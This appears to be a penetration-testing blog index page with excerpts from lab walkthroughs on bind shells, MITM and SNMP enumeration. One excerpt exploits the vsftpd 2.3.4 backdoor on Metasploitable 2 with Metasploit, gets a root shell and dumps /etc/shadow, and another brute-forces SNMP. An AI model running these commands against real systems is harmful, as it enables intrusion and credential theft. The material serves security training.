Working With Bind and Reverse Shells

Bind shells are commonly used by penetration testers to logically set up a service port in a listening state on a targeted system while binding the listening service port to a native shell such as Bourne Again Shell (Bash) on Linux or Command Prompt on Windows; this is commonly referred to as a listener. Once the penetration tester initiates a connection to the listener and a session is established, the penetration tester will gain access to the targeted system’s native shell, whether it’s Bash on Linux or Command Prompt on a Windows-based system. ...

November 24, 2025 · 6 min · 1100 words · 0x-s0M3n4th

MITM Attacks

When connected to a network, whether it is wired or wireless, there are a lot of packets being sent back and forth between hosts. Some of these packets may contain sensitive and confidential information, such as usernames, passwords, password hashes, and documents, which are valuable to a penetration tester. While there are many secure network protocols that provide data encryption, there are many insecure network protocols that transmit data in plaintext. ...

November 24, 2025 · 6 min · 1146 words · 0x-s0M3n4th

Identifying and Exploiting Vulnerable Services

Exploiting linux-based systems: Fire up metasploitanle 2 linux Scan the target using nmap: nmap -A -p 21 172.30.1.134 Nmap was able to identify the service version of the FTP service as vsFTPd 2.3.4 Search in google vsftpd 2.3.4 exploit ![[Pasted image 20251020125219.png]] We are having an exploit module from rapid7 itself Open up msfconsole sudo msfconsole msf6 > use exploit/unix/ftp/vsftpd_234_backdoor msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/ interact msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 172.30.1.20 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 6. Upgrading shell using command python -c 'import pty; pty.spawn("/bin/bash")' 7. Got a root shell on the target system , dumped the /etc/shadow file where the hashes of the user’s passwords stored. 8. Save the credentials into a text file, make sure edit the unecessary users from the output: ...

November 24, 2025 · 5 min · 979 words · 0x-s0M3n4th

BGP Hijacking

COMING SOON

November 24, 2025 · 1 min · 2 words · 0x-s0M3n4th

SNMP Exploitation

Scanning for SNMP service using NMAP : nmap -sU -sT -p U:161,T:161 192.168.83.140 2. Open msfconsole and use the module named snmp_enum 3. Then run it: It has dumped all the network information like services running, open TCP,UDP ports, network interfaces, file share information, storage information, file system info, device info, software components, processes Using tools other than metasploit: NMAP: nmap -sU -p 161 --script snmp-brute 192.168.83.140 2. snmpset : ...

November 24, 2025 · 4 min · 809 words · 0x-s0M3n4th